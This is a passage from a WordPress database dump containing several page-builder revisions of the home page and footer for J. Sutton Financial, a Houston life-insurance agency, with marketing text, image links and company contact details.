global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"77px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"99.9%\" custom_margin=\"|-14px||||\" custom_padding=\"8px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_style=\"fade\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 18:56:52','2023-04-02 18:56:52','',138,'http://cmdev-site1.com/?p=610',0,'revision','',0),(611,1,'2023-04-02 18:58:34','2023-04-02 18:58:34','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"77px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"99.9%\" custom_margin=\"|-14px||||\" custom_padding=\"8px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_style=\"fade\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" link_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_option_url_new_window=\"on\" sticky_enabled=\"0\" text_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 18:58:34','2023-04-02 18:58:34','',138,'http://cmdev-site1.com/?p=611',0,'revision','',0),(613,1,'2023-04-02 18:59:06','2023-04-02 18:59:06','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#FFFFFF|dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" min_height=\"24.8px\" custom_margin=\"||66px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\" sticky_enabled=\"0\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/privacy-policy/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','523-revision-v1','','','2023-04-02 18:59:06','2023-04-02 18:59:06','',523,'http://cmdev-site1.com/?p=613',0,'revision','',0),(614,1,'2023-04-02 19:00:32','2023-04-02 19:00:32','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" 